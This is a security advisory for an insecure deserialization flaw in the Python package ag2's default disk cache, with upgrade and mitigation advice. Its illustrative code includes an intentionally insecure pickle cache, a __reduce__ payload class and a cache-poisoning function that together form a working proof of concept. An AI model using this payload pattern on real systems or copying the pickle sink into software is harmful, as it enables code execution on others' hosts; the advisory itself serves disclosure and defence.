
AIKIDO-2026-10543

ag2 is vulnerable to Insecure Deserialization

Insecure Deserialization | CVE-2025-69872 | Published Apr 24, 2026

Score: 75 (High Risk)

This Affects:

Python: ag2
0.3.2b2 - 0.11.5
Fixed in 0.12.0

TL;DR

The package used to list diskcache as a required dependency, and the default cache_factory path constructed a disk-backed DiskCache whenever neither Redis nor Cosmos DB was configured. The diskcache library rehydrates stored objects with pickle, so anyone who can create or modify files under the cache path gets arbitrary code executed in the ag2 process as soon as those entries are read. The fix makes diskcache an optional extra, documents the risk on the import path, defaults the factory to in-memory caching when the extra is not installed, and uses the disk implementation only when the optional diskcache extra is present.
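The following is an added illustration, not ag2's or diskcache's own code. It stands in a minimal pickle-per-file cache for diskcache (the real library stores values in SQLite and files, but rehydrates them with pickle all the same), shows how a poisoned entry under the cache directory runs an attacker-chosen callable when the entry is read, and sketches the post-fix factory shape: in-memory unless the disk extra is installed and a cache directory is supplied. All class and function names here (PickleFileCache, InMemoryCache, MarkerPayload, cache_factory, cache_dir_is_private) are hypothetical; the payload calls os.makedirs so the effect is visible without doing anything harmful.

```python
"""Added example (not ag2 code): pickle-backed disk cache as a code-execution sink,
and a cache factory that only touches the disk when explicitly opted in."""
import os
import pickle
import stat
from pathlib import Path
from typing import Any, Optional


class PickleFileCache:
    """Stand-in for a disk-backed cache: one pickled file per key.
    This layout is an assumption for the example, not diskcache's real on-disk format."""

    def __init__(self, cache_dir: str):
        self.dir = Path(cache_dir)
        self.dir.mkdir(parents=True, exist_ok=True)

    def _path(self, key: str) -> Path:
        return self.dir / f"{key}.pkl"

    def set(self, key: str, value: Any) -> None:
        self._path(key).write_bytes(pickle.dumps(value))

    def get(self, key: str, default: Any = None) -> Any:
        p = self._path(key)
        if not p.exists():
            return default
        # pickle.loads runs whatever callables the bytes name: this is the sink.
        return pickle.loads(p.read_bytes())


class InMemoryCache:
    """Process-local cache; nothing is ever deserialised from disk."""

    def __init__(self) -> None:
        self._d: dict = {}

    def set(self, key: str, value: Any) -> None:
        self._d[key] = value

    def get(self, key: str, default: Any = None) -> Any:
        return self._d.get(key, default)


class MarkerPayload:
    """Attacker-controlled object. On unpickle it calls os.makedirs(marker);
    os.system or subprocess.Popen would work the same way."""

    def __init__(self, marker: str):
        self.marker = marker

    def __reduce__(self):
        return (os.makedirs, (self.marker,))


def poison_cache(cache_dir: str, key: str, marker: str) -> None:
    """What a local attacker with write access to the cache path does:
    drop a crafted pickle under an entry the application will later read."""
    Path(cache_dir).mkdir(parents=True, exist_ok=True)
    (Path(cache_dir) / f"{key}.pkl").write_bytes(pickle.dumps(MarkerPayload(marker)))


def victim_reads(cache_dir: str, key: str) -> Any:
    """The vulnerable path: build the disk cache and read an entry from it."""
    return PickleFileCache(cache_dir).get(key)


def diskcache_available() -> bool:
    """True only if the optional extra is installed in this environment."""
    try:
        import diskcache  # noqa: F401
    except ImportError:
        return False
    return True


def cache_factory(cache_dir: Optional[str] = None, use_disk: Optional[bool] = None):
    """Post-fix shape (hypothetical signature): default to in-memory caching and use
    the disk implementation only when the extra is present and a directory is given."""
    if use_disk is None:
        use_disk = diskcache_available()
    if use_disk and cache_dir:
        return PickleFileCache(cache_dir)
    return InMemoryCache()


def cache_dir_is_private(cache_dir: str) -> bool:
    """Caveat for deployments that keep the disk extra: the cache directory must be
    owned by the service user and not group/other-writable, or the sink is reachable."""
    st = os.stat(cache_dir)
    return st.st_uid == os.getuid() and not (st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))
```

Run poison_cache against a directory, then victim_reads on the same key: the marker directory appears before get() even returns, which is the whole problem with trusting pickled files. With use_disk=False (or no diskcache extra installed) cache_factory hands back the in-memory cache and the filesystem is never consulted.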

Who does this affect?

You are affected if you run ag2 0.3.2b2 through 0.11.5 with the default cache_factory path, that is, with neither Redis nor Cosmos DB configured, and an attacker can create or modify files under the cache directory (a shared host, a world-writable or group-writable cache path, or a mounted volume another workload can write to).

Background info

ag2 is vulnerable to Insecure Deserialization in versions 0.3.2b2 - 0.11.5.

How to fix this

Upgrade ag2 to 0.12.0 or later. If you still install the optional diskcache extra, the disk cache continues to rehydrate entries with pickle, so restrict the cache directory to the service user and treat its contents as trusted only to the extent that path is.